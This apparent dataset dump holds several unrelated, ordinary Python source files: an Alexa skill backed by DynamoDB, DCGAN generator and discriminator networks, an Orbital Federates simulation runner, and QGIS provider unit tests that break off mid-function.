text stringlengths 957 885k |
|---|
import os
import sys
import logging
import boto3
import inflect
import pendulum
from ask_sdk_core.skill_builder import CustomSkillBuilder
from ask_sdk_core.api_client import DefaultApiClient
from ask_sdk_core.utils import (
is_request_type, is_intent_name,
get_api_access_token, get_device_id)
from ask_sdk_core.handler_input import HandlerInput
from ask_sdk_dynamodb.adapter import DynamoDbAdapter
from ask_sdk_model.ui import (
AskForPermissionsConsentCard, SimpleCard)
from ask_sdk_model import Response
from ask_sdk_model.services import ServiceException
from ask_sdk_model.services.directive import (
Header, SendDirectiveRequest, SpeakDirective)
from botocore.exceptions import ClientError
from boto3.dynamodb.conditions import Key, Attr
# Select the DynamoDB endpoint from the deployment environment.
ENV = os.environ['ENV']
if ENV == 'LOCAL':
    # docker-compose: DynamoDB Local is reachable by its service name.
    dynamodb = boto3.resource(
        'dynamodb',
        endpoint_url='http://dynamodb:8000'
    )
elif ENV == 'TEST':
    # CI/test: DynamoDB Local runs on the host.
    dynamodb = boto3.resource(
        'dynamodb',
        endpoint_url='http://localhost:8000'
    )
else:
    # Production: real AWS endpoint, with X-Ray tracing enabled.
    from aws_xray_sdk.core import patch_all  # noqa
    patch_all()
    dynamodb = boto3.resource('dynamodb')

# Alexa customer-profile permissions this skill requests.
PERMISSIONS = [
    'alexa::profile:given_name:read',
    'read::alexa:device:all:address',
]

# ------------------------------ #
# Canned speech output. TODO move speech to locale files
SKILL_NAME = "{{cookiecutter.alexa_skill_name}}"
WELCOME = f"Welcome to {SKILL_NAME}"
# BUG FIX: "thank's" -> "thanks" in the spoken goodbye.
GOODBYE = f"Goodbye, thanks for spending time with {SKILL_NAME} today."
FALLBACK = "I'm not sure I can do that at the moment.... sorry."
ERROR = "Sorry, I'm not sure what you are asking me. Can you please ask again!!"
ERROR_SKILL = "There was an error with the skill, please check the logs."
HELP = "You can ask me about your {{cookiecutter.alexa_skill_summary}}"
# BUG FIX: "To turn share these details" -> "To share these details".
NOTIFY_MISSING_PERMISSIONS = f"{SKILL_NAME} would like to access your details. To share these details, please go to your Alexa app, and follow the instructions."
NOTIFY_ADDRESS_PROBLEM = "There was a problem with your address, please state your town when asking for local news"
DATA_CHECKING = "Just checking the data for you now"
# BUG FIX: "getting start" -> "getting started".
WHATS_NEW = "We're just getting started and this skill is still a work in progress."
# ------------------------------ #
sb = CustomSkillBuilder(api_client=DefaultApiClient())
logger = logging.getLogger(__name__)
logger.setLevel(os.environ['LOGGING'])

# Persistence and data store.
table = os.environ['DYNAMODB']
# BUG FIX: a second, unconditional boto3.resource('dynamodb') used to be
# created here, clobbering the environment-specific resource built above
# and silently pointing LOCAL/TEST runs at the real AWS endpoint.
dynamodb_table = dynamodb.Table(table)
adapter = DynamoDbAdapter(
    table, partition_key_name='uuid', dynamodb_resource=dynamodb)
p = inflect.engine()  # pluralises nouns in generated speech
# TODO better code re-use, less C&P
'''
Generic handlers
'''
@sb.request_handler(can_handle_func=is_request_type("LaunchRequest"))
def launch_request_handler(handler_input):
    '''
    Occurs when the skill is invoked without an intent.
    Persists the request time and greets the user by name when the
    given-name permission has been granted.
    type: (HandlerInput) -> Response
    '''
    logger.debug('location: {}'.format(whoami()))
    request_envelope = handler_input.request_envelope
    response_builder = handler_input.response_builder
    # TODO Check if we have a returning user
    try:
        # BUG FIX: DynamoDB cannot serialize datetime objects, so the raw
        # pendulum DateTime made every save fail; persist an ISO-8601 string.
        attr = {
            'last_request_time': pendulum.now().to_iso8601_string(),
        }
        adapter.save_attributes(request_envelope, attr)
        logger.debug('Persistence (save): {}'.format(attr))
    except Exception as e:
        logger.error('Error reported by saving persistence data : {}'.format(e))
    # Personalise the welcome when the given-name permission is granted;
    # fall back to the generic greeting on any service error.
    try:
        user_preferences_client = handler_input.service_client_factory.get_ups_service()
        profile_given_name = user_preferences_client.get_profile_given_name()
        speech_text = f"Welcome to {SKILL_NAME} {profile_given_name}."
    except Exception as e:
        logger.error('Error reported by user preferences client : {}'.format(e))
        speech_text = WELCOME
    response_builder.speak(speech_text).ask(speech_text).set_card(
        SimpleCard(SKILL_NAME, speech_text))
    return response_builder.response
@sb.request_handler(can_handle_func=is_intent_name("AMAZON.HelpIntent"))
def help_intent_handler(handler_input):
    '''
    Handle AMAZON.HelpIntent by describing what the skill can do.
    type: (HandlerInput) -> Response
    '''
    logger.debug('location: {}'.format(whoami()))
    builder = handler_input.response_builder
    builder.speak(HELP)
    builder.ask(HELP)
    builder.set_card(SimpleCard(SKILL_NAME, HELP))
    return builder.response
@sb.request_handler(can_handle_func=is_intent_name("AMAZON.FallbackIntent"))
def fallback_intent_handler(handler_input):
    '''
    Catch-all for utterances that match no other intent.
    type: (HandlerInput) -> Response
    '''
    logger.debug('location: {}'.format(whoami()))
    builder = handler_input.response_builder
    builder.speak(FALLBACK)
    builder.ask(FALLBACK)
    builder.set_card(SimpleCard(SKILL_NAME, FALLBACK))
    return builder.response
@sb.request_handler(
    can_handle_func=lambda handler_input:
    is_intent_name("AMAZON.CancelIntent")(handler_input) or
    is_intent_name("AMAZON.StopIntent")(handler_input) or
    is_intent_name("AMAZON.PauseIntent")(handler_input))
def cancel_and_stop_intent_handler(handler_input):
    '''
    Say goodbye and end the session for Cancel, Stop and Pause.
    type: (HandlerInput) -> Response
    '''
    logger.debug('location: {}'.format(whoami()))
    builder = handler_input.response_builder
    builder.speak(GOODBYE).set_card(
        SimpleCard(SKILL_NAME, GOODBYE)).set_should_end_session(True)
    return builder.response
@sb.request_handler(can_handle_func=is_request_type("SessionEndedRequest"))
def session_ended_request_handler(handler_input):
    '''
    Session end
    type: (HandlerInput) -> Response
    any cleanup logic goes here
    '''
    logger.debug('location: {}'.format(whoami()))
    # BUG FIX: the docstring promises a Response but the handler returned
    # None; return an (empty) response so the dispatcher contract holds.
    return handler_input.response_builder.response
'''
Deal with skill intents
'''
@sb.request_handler(can_handle_func=is_intent_name("AboutUser"))
def aboutuser_intent_handler(handler_input):
    '''
    Report local news items for the user's location.
    The location comes from the `location_slot` slot when supplied,
    otherwise from the device address (requires the address permission).
    type: (HandlerInput) -> Response
    '''
    logger.debug('location: {}'.format(whoami()))
    request_envelope = handler_input.request_envelope
    response_builder = handler_input.response_builder
    # See if we have a location slot, otherwise fall back to the address.
    slots = request_envelope.request.intent.slots
    slot_name = 'location_slot'
    location_list = []
    if slot_name in slots:
        location_list = [slots[slot_name].value]
        logger.debug('slot name: {} value {}'.format(slot_name, location_list))
    # BUG FIX: `location_list[0]` used to raise IndexError when the slot
    # was absent entirely; guard the empty list as well as a None value.
    if not location_list or location_list[0] is None:
        # Need the location from the device address; check permissions first.
        if not (request_envelope.context.system.user.permissions and
                request_envelope.context.system.user.permissions.consent_token):
            logger.error('Insufficient permissions')
            response_builder.speak(NOTIFY_MISSING_PERMISSIONS)
            response_builder.set_card(
                AskForPermissionsConsentCard(permissions=PERMISSIONS))
            return response_builder.response
        try:
            device_id = get_device_id(handler_input)
            device_addr_client = handler_input.service_client_factory.get_device_address_service()
            address = device_addr_client.get_full_address(device_id)
            logger.debug('Address: {}'.format(address))
            if address.city is None or address.state_or_region is None:
                # BUG FIX: previously fell through and scanned with no
                # usable location; report the problem and stop here.
                response_builder.speak(NOTIFY_ADDRESS_PROBLEM).set_card(
                    SimpleCard(SKILL_NAME, NOTIFY_ADDRESS_PROBLEM)
                ).set_should_end_session(True)
                return response_builder.response
            location_list = [address.city, address.state_or_region]
        except ServiceException as e:
            logger.error('Error reported by device location service: {}'.format(e))
            raise e
        except Exception as e:
            logger.error('Error: {}'.format(e))
            response_builder.speak(ERROR_SKILL).set_card(
                SimpleCard(SKILL_NAME, ERROR_SKILL)).set_should_end_session(True)
            return response_builder.response
    # For long lookups a progressive response could be enqueued here; see
    # https://developer.amazon.com/en-US/docs/alexa/alexa-skills-kit-sdk-for-python/call-alexa-service-apis.html#directiveserviceclient
    try:
        # TODO fix the capitalisation on non-towns (and probably the user data)
        # TODO need to ensure we scan the data for all items in location_list
        r = dynamodb_table.scan(
            FilterExpression=Attr('location').contains(location_list[0])
        )
        logger.debug('r: {}'.format(r))
    except Exception as e:
        logger.error('Error (dynamodb_table): {}'.format(e))
        # BUG FIX: `r` is undefined on scan failure, so continuing used to
        # raise NameError below; report the failure and stop instead.
        speech_text = "It's all gone pete tong"
        response_builder.speak(speech_text).set_card(
            SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(True)
        return response_builder.response
    news_locations = ' and '.join(location_list)
    if r['Count'] > 0:
        news_item_count = r['Count']
        speech_text = f"I've found {news_item_count} news {p.plural('item', news_item_count)} for you in {news_locations}....."
    else:
        speech_text = f"I couldn't find any news items in {news_locations} at this time, sorry."
    response_builder.speak(speech_text).set_card(
        SimpleCard(SKILL_NAME, speech_text)).set_should_end_session(True)
    return response_builder.response
@sb.request_handler(can_handle_func=is_intent_name("GetColour"))
def get_colour_intent_handler(handler_input):
    '''
    Get the users preferred colour (stub: no colour is stored yet).
    type: (HandlerInput) -> Response
    '''
    logger.debug('location: {}'.format(whoami()))
    builder = handler_input.response_builder
    speech_text = "I don't know what colour you like, sorry."
    builder.speak(speech_text)
    builder.ask(speech_text)
    builder.set_card(SimpleCard(SKILL_NAME, speech_text))
    return builder.response
@sb.request_handler(can_handle_func=is_intent_name("SetColour"))
def set_colour_intent_handler(handler_input):
    '''
    Set the users preferred colour (stub: nothing is persisted yet).
    type: (HandlerInput) -> Response
    '''
    # BUG FIX: docstring was copied from GetColour and said "Get".
    logger.debug('location: {}'.format(whoami()))
    response_builder = handler_input.response_builder
    speech_text = "I don't know what colour you like, sorry."
    response_builder.speak(speech_text).ask(speech_text).set_card(
        SimpleCard(SKILL_NAME, speech_text))
    return response_builder.response
'''
Helpers
'''
@sb.global_request_interceptor()
def request_logger(handler_input):
    '''
    Log every incoming request envelope and its persisted attributes.
    '''
    envelope = handler_input.request_envelope
    logger.debug('Alexa Request: {}'.format(envelope.request))
    logger.debug('Persistence (get): {}'.format(
        adapter.get_attributes(envelope)))
'''
Exceptions
'''
@sb.exception_handler(can_handle_func=lambda i, e: True)
def all_exception_handler(handler_input, exception):
    '''
    type: (HandlerInput, Exception) -> Response
    Log the exception in CloudWatch Logs and reply with a generic apology.
    '''
    logger.debug('location: {}'.format(whoami()))
    # BUG FIX: unhandled exceptions were logged at debug level, so they
    # were invisible at the usual production log level.
    logger.error('exception: {}'.format(exception))
    logger.debug('request_envelope: {}'.format(handler_input.request_envelope))
    speech = ERROR
    handler_input.response_builder.speak(speech).ask(speech)
    return handler_input.response_builder.response
def whoami():
    '''Return the name of the calling function (used for debug logging).'''
    caller_frame = sys._getframe(1)
    return caller_frame.f_code.co_name
# Build the skill object and expose the AWS Lambda entry point.
skill = sb.create()
lambda_handler = sb.lambda_handler()
|
import torch.nn as nn
import config
class NetG(nn.Module):
    '''
    DCGAN-style generator: maps a latent batch of shape
    (N, config.latent_dim, 1, 1) to an RGB image (Tanh output in [-1, 1])
    through five transposed-convolution stages.
    '''

    def __init__(self):
        super(NetG, self).__init__()
        # Stages are kept as named attributes layer_1..layer_5 so existing
        # checkpoints (state_dict keys) remain loadable.
        self.layer_1 = nn.Sequential(
            nn.ConvTranspose2d(config.latent_dim, 512, kernel_size=4,
                               stride=1, bias=False),
            nn.BatchNorm2d(512),
            nn.LeakyReLU(0.2, inplace=True),
        )
        self.layer_2 = nn.Sequential(
            nn.ConvTranspose2d(512, 256, 5, 2, bias=False),
            nn.BatchNorm2d(256),
            nn.Dropout(p=0.5),
            nn.LeakyReLU(0.2, inplace=True),
        )
        self.layer_3 = nn.Sequential(
            nn.ConvTranspose2d(256, 256, 5, 2, bias=False),
            nn.BatchNorm2d(256),
            nn.Dropout(p=0.5),
            nn.LeakyReLU(0.2, inplace=True),
        )
        self.layer_4 = nn.Sequential(
            nn.ConvTranspose2d(256, 128, 5, 2, bias=False),
            nn.BatchNorm2d(128),
            nn.Dropout(p=0.5),
            nn.LeakyReLU(0.2, inplace=True),
        )
        self.layer_5 = nn.Sequential(
            nn.ConvTranspose2d(128, 3, 5, 2, bias=False),
            nn.Tanh(),
        )
        # DCGAN initialisation for the transposed convolutions.
        for module in self.modules():
            if isinstance(module, nn.ConvTranspose2d):
                nn.init.normal_(module.weight, mean=0, std=0.02)

    def forward(self, x):
        '''Run the latent batch through the five stages in order.'''
        out = x
        for stage in (self.layer_1, self.layer_2, self.layer_3,
                      self.layer_4, self.layer_5):
            out = stage(out)
        return out
class NetD(nn.Module):
    '''
    DCGAN-style discriminator/critic: maps an RGB image batch to a single
    un-squashed score map (the final Sigmoid is intentionally commented
    out, which suits WGAN-style losses).

    NOTE(review): the per-layer size comments suggest a 96x96 input, but a
    96x96 image reaches layer_5 as a 3x3 map that a 4x4 kernel cannot
    cover (a 100x100 input does yield a 1x1 output) -- confirm the
    intended input resolution.
    '''

    def __init__(self):
        super(NetD, self).__init__()
        self.layer_1 = nn.Sequential(  # 96*96*3
            nn.Conv2d(3, 128, kernel_size=5, stride=3, padding=1, bias=False),
            nn.LeakyReLU(0.2, inplace=True)
        )
        self.layer_2 = nn.Sequential(  # 32*32*128
            nn.Conv2d(128, 256, 5, 2, bias=False),
            nn.BatchNorm2d(256),
            nn.LeakyReLU(0.2, inplace=True)
        )
        self.layer_3 = nn.Sequential(  # 14*14*256
            nn.Conv2d(256, 256, 3, 2, bias=False),
            nn.BatchNorm2d(256),
            nn.LeakyReLU(0.2, inplace=True)
        )
        self.layer_4 = nn.Sequential(  # 6*6*512
            nn.Conv2d(256, 512, 3, 2, 1, bias=False),
            nn.BatchNorm2d(512),
            nn.LeakyReLU(0.2, inplace=True)
        )
        self.layer_5 = nn.Sequential(  # 3*3*1024
            nn.Conv2d(512, 1, 4, 1, bias=False),
            # no Sigmoid: raw scores
        )
        # BUG FIX: this loop previously tested isinstance(m,
        # nn.ConvTranspose2d) -- copied from the generator -- which never
        # matches in a Conv2d-only network, so the DCGAN weight init was
        # silently skipped.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.normal_(m.weight, mean=0, std=0.02)

    def forward(self, x):
        '''Score a batch of images; returns shape (N, 1, H', W').'''
        out = self.layer_1(x)
        out = self.layer_2(out)
        out = self.layer_3(out)
        out = self.layer_4(out)
        out = self.layer_5(out)
        return out
|
<filename>bin/ofs.py
"""
Copyright 2015 <NAME>, Massachusetts Institute of Technology
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
import logging
import sys,os
# add ofspy to system path
sys.path.append(os.path.abspath('..'))
from ofspy.ofs import OFS
if __name__ == '__main__':
    # Command-line entry point for an Orbital Federates (OFS) simulation run.
    # NOTE: Python 2 source (print statements, Tkinter import below).
    parser = argparse.ArgumentParser(description="This program runs an Orbital Federates simulation.")
    # Positional: initial elements encoded as <player>.<type>@<location>,<modules...>
    parser.add_argument('elements', type=str, nargs='+',
                        help='the list of initial elements, e.g. 1.GroundSta@SUR1,pSGL 1.SmallSat@LEO1,pSGL,SAR')
    parser.add_argument('-d', '--numTurns', type=int, default=24,
                        help='simulation duration (number of turns)')
    parser.add_argument('-p', '--numPlayers', type=int, default=None,
                        help='number of players')
    parser.add_argument('-i', '--initialCash', type=int, default=None,
                        help='initial cash')
    parser.add_argument('-s', '--seed', type=int, default=0,
                        help='random number seed')
    parser.add_argument('-o', '--ops', type=str, default='d6',
                        help='federate operations model specification')
    parser.add_argument('-f', '--fops', type=str, default='',
                        help='federation operations model specification')
    parser.add_argument('-l', '--logging', type=str, default='error',
                        choices=['debug','info','warning','error'],
                        help='logging level')
    parser.add_argument('-g', '--gui', action='store_true',
                        help='launch with graphical user interface')
    args = parser.parse_args()
    # Map the --logging choice onto the stdlib logging level constants;
    # argparse `choices` guarantees one of these branches is taken.
    if args.logging == 'debug':
        level = logging.DEBUG
    elif args.logging == 'info':
        level = logging.INFO
    elif args.logging == 'warning':
        level = logging.WARNING
    elif args.logging == 'error':
        level = logging.ERROR
    logging.basicConfig(level=level)
    # Echo the parsed arguments (unconditional debug output).
    print args
    # count the number of players if not specified
    if args.numPlayers is None:
        numPlayers = 0
        for element in args.elements:
            specs = element.split(',')
            if len(specs) > 0 and len(specs[0].split('@')) == 2:
                # parse player ownership
                # '<pId>.<type>@<loc>' uses a 1-based player id; elements
                # without an ownership prefix default to player 0.
                if len(specs[0].split('@')[0].split('.')) == 2:
                    pId = int(specs[0].split('@')[0].split('.')[0])-1
                else:
                    pId = 0
                numPlayers = max(numPlayers, pId+1)
    else:
        numPlayers = args.numPlayers
    # set up the simulation
    ofs = OFS(elements=args.elements, numTurns=args.numTurns,
              numPlayers=numPlayers, initialCash=args.initialCash,
              seed=args.seed, ops=args.ops, fops=args.fops)
    if args.gui:
        # launch gui and start simulation
        from Tkinter import Tk
        from ofspy_gui.frame import FrameOFS
        root = Tk()
        frame = FrameOFS(root, ofs)
        ofs.sim.init()
        root.mainloop()
    else:
        # execute simulation and output results, one "key:value" per line
        results = ofs.execute()
        for result in results:
            print '{0}:{1}'.format(result[0], result[1])
# -*- coding: utf-8 -*-
"""QGIS Unit test utils for provider tests.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
from builtins import str
from builtins import object
__author__ = '<NAME>'
__date__ = '2015-04-27'
__copyright__ = 'Copyright 2015, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '1<PASSWORD>ce<PASSWORD>'
from qgis.core import (
QgsApplication,
QgsRectangle,
QgsFeatureRequest,
QgsFeature,
QgsGeometry,
QgsAbstractFeatureIterator,
QgsExpressionContextScope,
QgsExpressionContext,
QgsExpression,
QgsVectorDataProvider,
QgsVectorLayerFeatureSource,
QgsFeatureSink,
QgsTestUtils,
QgsFeatureSource,
NULL
)
from qgis.PyQt.QtTest import QSignalSpy
from utilities import compareWkt
from featuresourcetestbase import FeatureSourceTestCase
class ProviderTestCase(FeatureSourceTestCase):
'''
This is a collection of tests for vector data providers and kept generic.
To make use of it, subclass it and set self.source to a provider you want to test.
Make sure that your provider uses the default dataset by converting one of the provided datasets from the folder
tests/testdata/provider to a dataset your provider is able to handle.
To test expression compilation, add the methods `enableCompiler()` and `disableCompiler()` to your subclass.
If these methods are present, the tests will ensure that the result of server side and client side expression
evaluation are equal.
'''
def uncompiledFilters(self):
""" Individual derived provider tests should override this to return a list of expressions which
cannot be compiled """
return set()
def enableCompiler(self):
"""By default there is no expression compiling available, needs to be overridden in subclass"""
print('Provider does not support compiling')
return False
def partiallyCompiledFilters(self):
""" Individual derived provider tests should override this to return a list of expressions which
should be partially compiled """
return set()
def assert_query(self, source, expression, expected):
FeatureSourceTestCase.assert_query(self, source, expression, expected)
if self.compiled:
# Check compilation status
it = source.getFeatures(QgsFeatureRequest().setFilterExpression(expression))
if expression in self.uncompiledFilters():
self.assertEqual(it.compileStatus(), QgsAbstractFeatureIterator.NoCompilation)
elif expression in self.partiallyCompiledFilters():
self.assertEqual(it.compileStatus(), QgsAbstractFeatureIterator.PartiallyCompiled)
else:
self.assertEqual(it.compileStatus(), QgsAbstractFeatureIterator.Compiled)
def runGetFeatureTests(self, source):
FeatureSourceTestCase.runGetFeatureTests(self, source)
# combination of an uncompilable expression and limit
feature = next(self.vl.getFeatures('pk=4'))
context = QgsExpressionContext()
scope = QgsExpressionContextScope()
scope.setVariable('parent', feature)
context.appendScope(scope)
request = QgsFeatureRequest()
request.setExpressionContext(context)
request.setFilterExpression('"pk" = attribute(@parent, \'pk\')')
request.setLimit(1)
values = [f['pk'] for f in self.vl.getFeatures(request)]
self.assertEqual(values, [4])
    def runPolyGetFeatureTests(self, provider):
        """Geometry-expression queries against the 4-feature polygon layer.

        Each assert_query pairs an expression with the exact pk list the
        default polygon test dataset must return.
        """
        assert len([f for f in provider.getFeatures()]) == 4
        # geometry
        self.assert_query(provider, 'x($geometry) < -70', [1])
        self.assert_query(provider, 'y($geometry) > 79', [1, 2])
        self.assert_query(provider, 'xmin($geometry) < -70', [1, 3])
        self.assert_query(provider, 'ymin($geometry) < 76', [3])
        self.assert_query(provider, 'xmax($geometry) > -68', [2, 3])
        self.assert_query(provider, 'ymax($geometry) > 80', [1, 2])
        self.assert_query(provider, 'area($geometry) > 10', [1])
        self.assert_query(provider, 'perimeter($geometry) < 12', [2, 3])
        # DE-9IM relate checks, with and without an explicit pattern
        self.assert_query(provider,
                          'relate($geometry,geom_from_wkt( \'Polygon ((-68.2 82.1, -66.95 82.1, -66.95 79.05, -68.2 79.05, -68.2 82.1))\')) = \'FF2FF1212\'',
                          [1, 3])
        self.assert_query(provider,
                          'relate($geometry,geom_from_wkt( \'Polygon ((-68.2 82.1, -66.95 82.1, -66.95 79.05, -68.2 79.05, -68.2 82.1))\'), \'****F****\')',
                          [1, 3])
        # predicate functions
        self.assert_query(provider,
                          'crosses($geometry,geom_from_wkt( \'Linestring (-68.2 82.1, -66.95 82.1, -66.95 79.05)\'))',
                          [2])
        self.assert_query(provider,
                          'overlaps($geometry,geom_from_wkt( \'Polygon ((-68.2 82.1, -66.95 82.1, -66.95 79.05, -68.2 79.05, -68.2 82.1))\'))',
                          [2])
        self.assert_query(provider,
                          'within($geometry,geom_from_wkt( \'Polygon ((-75.1 76.1, -75.1 81.6, -68.8 81.6, -68.8 76.1, -75.1 76.1))\'))',
                          [1])
        # predicates combined with geometry-transforming functions
        self.assert_query(provider,
                          'overlaps(translate($geometry,-1,-1),geom_from_wkt( \'Polygon ((-75.1 76.1, -75.1 81.6, -68.8 81.6, -68.8 76.1, -75.1 76.1))\'))',
                          [1])
        self.assert_query(provider,
                          'overlaps(buffer($geometry,1),geom_from_wkt( \'Polygon ((-75.1 76.1, -75.1 81.6, -68.8 81.6, -68.8 76.1, -75.1 76.1))\'))',
                          [1, 3])
        self.assert_query(provider,
                          'intersects(centroid($geometry),geom_from_wkt( \'Polygon ((-74.4 78.2, -74.4 79.1, -66.8 79.1, -66.8 78.2, -74.4 78.2))\'))',
                          [2])
        self.assert_query(provider,
                          'intersects(point_on_surface($geometry),geom_from_wkt( \'Polygon ((-74.4 78.2, -74.4 79.1, -66.8 79.1, -66.8 78.2, -74.4 78.2))\'))',
                          [1, 2])
        self.assert_query(provider, 'distance($geometry,geom_from_wkt( \'Point (-70 70)\')) > 7', [1, 2])
def testGetFeaturesUncompiled(self):
self.compiled = False
try:
self.disableCompiler()
except AttributeError:
pass
self.runGetFeatureTests(self.source)
if hasattr(self, 'poly_provider'):
self.runPolyGetFeatureTests(self.poly_provider)
def testGetFeaturesExp(self):
if self.enableCompiler():
self.compiled = True
self.runGetFeatureTests(self.source)
if hasattr(self, 'poly_provider'):
self.runPolyGetFeatureTests(self.poly_provider)
    def testSubsetString(self):
        """Exercise subset strings: dataChanged signal emission, filtering,
        and combination with rect filters and filter expressions.

        Each stanza sets a subset, reads features, then clears the subset
        before asserting, so a failure never leaves the source filtered.
        """
        if not self.source.supportsSubsetString():
            print('Provider does not support subset strings')
            return
        changed_spy = QSignalSpy(self.source.dataChanged)
        subset = self.getSubsetString()
        self.source.setSubsetString(subset)
        self.assertEqual(self.source.subsetString(), subset)
        # dataChanged must fire exactly once for an actual change
        self.assertEqual(len(changed_spy), 1)
        # No signal should be emitted if the subset string is not modified
        self.source.setSubsetString(subset)
        self.assertEqual(len(changed_spy), 1)
        result = set([f['pk'] for f in self.source.getFeatures()])
        all_valid = (all(f.isValid() for f in self.source.getFeatures()))
        self.source.setSubsetString(None)
        expected = set([2, 3, 4])
        assert set(expected) == result, 'Expected {} and got {} when testing subset string {}'.format(set(expected),
                                                                                                     result, subset)
        self.assertTrue(all_valid)
        # Subset string AND filter rect
        self.source.setSubsetString(subset)
        extent = QgsRectangle(-70, 70, -60, 75)
        request = QgsFeatureRequest().setFilterRect(extent)
        result = set([f['pk'] for f in self.source.getFeatures(request)])
        all_valid = (all(f.isValid() for f in self.source.getFeatures(request)))
        self.source.setSubsetString(None)
        expected = set([2])
        assert set(expected) == result, 'Expected {} and got {} when testing subset string {}'.format(set(expected),
                                                                                                     result, subset)
        self.assertTrue(all_valid)
        # Subset string AND filter rect, version 2
        self.source.setSubsetString(subset)
        extent = QgsRectangle(-71, 65, -60, 80)
        result = set([f['pk'] for f in self.source.getFeatures(QgsFeatureRequest().setFilterRect(extent))])
        self.source.setSubsetString(None)
        expected = set([2, 4])
        assert set(expected) == result, 'Expected {} and got {} when testing subset string {}'.format(set(expected),
                                                                                                     result, subset)
        # Subset string AND expression
        self.source.setSubsetString(subset)
        request = QgsFeatureRequest().setFilterExpression('length("name")=5')
        result = set([f['pk'] for f in self.source.getFeatures(request)])
        all_valid = (all(f.isValid() for f in self.source.getFeatures(request)))
        self.source.setSubsetString(None)
        expected = set([2, 4])
        assert set(expected) == result, 'Expected {} and got {} when testing subset string {}'.format(set(expected),
                                                                                                     result, subset)
        self.assertTrue(all_valid)
def getSubsetString(self):
"""Individual providers may need to override this depending on their subset string formats"""
return '"cnt" > 100 and "cnt" < 410'
def getSubsetString2(self):
"""Individual providers may need to override this depending on their subset string formats"""
return '"cnt" > 100 and "cnt" < 400'
def getSubsetString3(self):
"""Individual providers may need to override this depending on their subset string formats"""
return '"name"=\'Apple\''
def getSubsetStringNoMatching(self):
"""Individual providers may need to override this depending on their subset string formats"""
return '"name"=\'AppleBearOrangePear\''
def testGetFeaturesThreadSafety(self):
# no request
self.assertTrue(QgsTestUtils.testProviderIteratorThreadSafety(self.source))
# filter rect request
extent = QgsRectangle(-73, 70, -63, 80)
request = QgsFeatureRequest().setFilterRect(extent)
self.assertTrue(QgsTestUtils.testProviderIteratorThreadSafety(self.source, request))
def testOrderBy(self):
try:
self.disableCompiler()
except AttributeError:
pass
self.runOrderByTests()
def testOrderByCompiled(self):
if self.enableCompiler():
self.runOrderByTests()
def runOrderByTests(self):
FeatureSourceTestCase.runOrderByTests(self)
# Combination with subset of attributes
request = QgsFeatureRequest().addOrderBy('num_char', False).setSubsetOfAttributes(['pk'], self.vl.fields())
values = [f['pk'] for f in self.vl.getFeatures(request)]
self.assertEqual(values, [5, 4, 3, 2, 1])
def testOpenIteratorAfterLayerRemoval(self):
"""
Test that removing layer after opening an iterator does not crash. All required
information should be captured in the iterator's source and there MUST be no
links between the iterators and the layer's data provider
"""
if not getattr(self, 'getEditableLayer', None):
return
l = self.getEditableLayer()
self.assertTrue(l.isValid())
# store the source
source = QgsVectorLayerFeatureSource(l)
# delete the layer
del l
# get the features
pks = []
for f in source.getFeatures():
pks.append(f['pk'])
self.assertEqual(set(pks), {1, 2, 3, 4, 5})
def testGetFeaturesPolyFilterRectTests(self):
""" Test fetching features from a polygon layer with filter rect"""
try:
if not self.poly_provider:
return
except:
return
extent = QgsRectangle(-73, 70, -63, 80)
request = QgsFeatureRequest().setFilterRect(extent)
features = [f['pk'] for f in self.poly_provider.getFeatures(request)]
all_valid = (all(f.isValid() for f in self.source.getFeatures(request)))
# Some providers may return the exact intersection matches (2, 3) even without the ExactIntersect flag, so we accept that too
assert set(features) == set([2, 3]) or set(features) == set([1, 2, 3]), 'Got {} instead'.format(features)
self.assertTrue(all_valid)
# Test with exact intersection
request = QgsFeatureRequest().setFilterRect(extent).setFlags(QgsFeatureRequest.ExactIntersect)
features = [f['pk'] for f in self.poly_provider.getFeatures(request)]
all_valid = (all(f.isValid() for f in self.source.getFeatures(request)))
assert set(features) == set([2, 3]), 'Got {} instead'.format(features)
self.assertTrue(all_valid)
# test with an empty rectangle
extent = QgsRectangle()
features = [f['pk'] for f in self.source.getFeatures(QgsFeatureRequest().setFilterRect(extent))]
assert set(features) == set([1, 2, 3, 4, 5]), 'Got {} instead'.format(features)
def testMinValue(self):
self.assertFalse(self.source.minimumValue(-1))
self.assertFalse(self.source.minimumValue(1000))
self.assertEqual(self.source.minimumValue(self.source.fields().lookupField('cnt')), -200)
self.assertEqual(self.source.minimumValue(self.source.fields().lookupField('name')), 'Apple')
if self.source.supportsSubsetString():
subset = self.getSubsetString()
self.source.setSubsetString(subset)
min_value = self.source.minimumValue(self.source.fields().lookupField('cnt'))
self.source.setSubsetString(None)
self.assertEqual(min_value, 200)
def testMaxValue(self):
self.assertFalse(self.source.maximumValue(-1))
self.assertFalse(self.source.maximumValue(1000))
self.assertEqual(self.source.maximumValue(self.source.fields().lookupField('cnt')), 400)
self.assertEqual(self.source.maximumValue(self.source.fields().lookupField('name')), 'Pear')
if self.source.supportsSubsetString():
subset = self.getSubsetString2()
self.source.setSubsetString(subset)
max_value = self.source.maximumValue(self.source.fields().lookupField('cnt'))
self.source.setSubsetString(None)
self.assertEqual(max_value, 300)
def testExtent(self):
reference = QgsGeometry.fromRect(
QgsRectangle(-71.123, 66.33, -65.32, 78.3))
provider_extent = self.source.extent()
self.assertAlmostEqual(provider_extent.xMinimum(), -71.123, 3)
self.assertAlmostEqual(provider_extent.xMaximum(), -65.32, 3)
self.assertAlmostEqual(provider_extent.yMinimum(), 66.33, 3)
self.assertAlmostEqual(provider_extent.yMaximum(), 78.3, 3)
if self.source.supportsSubsetString():
# with only one point
subset = self.getSubsetString3()
self.source.setSubsetString(subset)
count = self.source.featureCount()
provider_extent = self.source.extent()
self.source.setSubsetString(None)
self.assertEqual(count, 1)
self.assertAlmostEqual(provider_extent.xMinimum(), -68.2, 3)
self.assertAlmostEqual(provider_extent.xMaximum(), -68.2, 3)
self.assertAlmostEqual(provider_extent.yMinimum(), 70.8, 3)
